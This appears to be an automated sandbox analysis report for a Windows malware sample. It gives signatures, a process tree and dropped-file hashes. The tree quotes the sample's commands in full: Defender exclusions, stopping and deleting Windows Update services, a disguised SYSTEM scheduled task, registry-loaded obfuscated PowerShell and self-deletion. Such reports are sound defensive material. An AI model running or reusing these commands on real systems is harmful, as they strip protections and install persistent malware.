Analysis
-
max time kernel
300s -
max time network
284s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
29-08-2022 22:20
General
-
Target
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe
-
Size
5.1MB
-
MD5
2438b851e157a3f70bd48af1984b2139
-
SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5
-
SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
-
SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
SSDEEP
98304:hoJgPPz4jnKiw6qbse0KZ3U/TUpm9OMtUdvHW4i/6jUH2+9Nx40u:onKl6qgeUoSOdPZi/GUH2QX40u
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 3 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Drops file in System32 directory 7 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 7 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 5 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {6396D06D-12A5-41EE-A6EE-7CC127D4DEBE} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
-
C:\Program Files\Platform\Defender\update.exe"C:\Program Files\Platform\Defender\update.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Platform\Defender\update.exe"5⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- Launches sc.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""6⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "epzggvhm"6⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe zryhtmslhfgrpc1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzYqn0Ua9E3eZCF6KVDnl4Om3mtJYdu2zYxf5VDSOtlwzNI2HELjSSWiBbhmq9nnQLcymNaMLbX6BcVfekXBXlHwtkdZ87kGHVBeHkhms/rlEKec4HZ9wIBVrc9Qi+y2+a3lep8HRZlmoXu5C0nH5vK2Z6XqFAlqh1P1TH9zlUlrSoi8iC8XAKUbdPgbva/qi9DzYr1RVc8QqRoXX8h4GvBaNJoiMytDP1XZ+7BxVOZddNH0XJdiGTlhqmJ6roc2xDtAY0xSKzjDUzaj6VcQ6dE4nGnXfnrH194gWO2Fle+qlRtL5DmSlHKlQNVMEwD+lLyH/56tXiuxnzEBOxWLJZa4aP8Qv/WXczd4ddilDeMPY13j7jZPu5TdLr9XBYda4edqFELpOQYd1Sl2t6HN/f/knReR0toj+9pfBIu/dyltFHYBgH8jIh3ZIp8xo/NopF9P+/CLEQGN4MNrl3tzSKPM88s7KlDiFV5IVDt9y2BSrs52V/tpdfNJYjkFjol69J6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9b4fc216-1b04-4d98-b1a8-a3ded48a75e8}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{1be567e1-ef9d-452a-85f6-f090b79afa0f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
- Drops file in System32 directory
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe"C:\Users\Admin\AppData\Local\Temp\bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe"3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"4⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "WindowsDefender"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe"4⤵
- Deletes itself
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1812053344-13137603341849279054-1531867791-656927532-20069545481267294742-548096435"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "839481360133411535821229599271760285217258247492-1329421035-1391618268-750026042"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13252671841248405139-361477564-16641125891446698982-1774112245-1399625881-1956927623"1⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""1⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Windows\Tasks\dialersvc32.jobFilesize
1KB
MD5323e8df3b89ceb56c3b58f90590ead74
SHA1662816f60c95bf7645d1066161cfafcd06c92bed
SHA25637149b2a9d459e47e45c4bfd3d72672610f201901823ebf0a148b0fe451c9880
SHA512f2250550de665fbaa72b739e9f8b8e1141417c19805fec6890776953f343ef33bf6f2d2100e4ed783a98e6f27f7772e022bd7c9760a8e63d8941f83f9f3da8d1
-
C:\Windows\Tasks\dialersvc64.jobFilesize
1KB
MD59c743d777b2f19c0d5b68b005b96213b
SHA18da55b4a8fe31ae8a7179e8298a132fad8df547e
SHA2562a57786c250c49f3df77c0c0a3e06833d9006261fd58461d87813753780480d0
SHA512e7e5bf6e46008c8502a63b2be1873115a5c2b45ea42c09c2164b9507aa66739fef76119a2b0547cc2b20b3bee339fb299ed15d13a8d4a35dbbff6069d9771c19
-
C:\Windows\system32\drivers\etc\hostsFilesize
3KB
MD5e546b81f1a1a1b753a4f6d3455394dec
SHA114f407db119dd97ed248be2a8d15a09ba938987a
SHA2561100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8
SHA51203f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
\Users\Admin\AppData\Roaming\33AF.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Windows\System32\config\systemprofile\AppData\Roaming\1C19.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
